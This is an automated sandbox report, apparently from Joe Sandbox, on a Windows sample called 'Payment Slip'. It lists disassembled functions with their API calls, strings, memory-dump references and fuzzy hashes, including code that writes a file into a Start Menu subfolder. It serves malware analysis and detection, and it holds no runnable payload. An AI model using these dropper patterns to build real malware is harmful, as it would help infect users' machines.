Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 004024EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A
8, xrefs: 0040250A

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1453599865-3010710425
Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(0001E7BF,00000064,0002368D), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23

Strings

: Completed, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9

Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405939
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405943
lstrcatW.KERNEL32(?,00409014), ref: 00405955

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405933

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
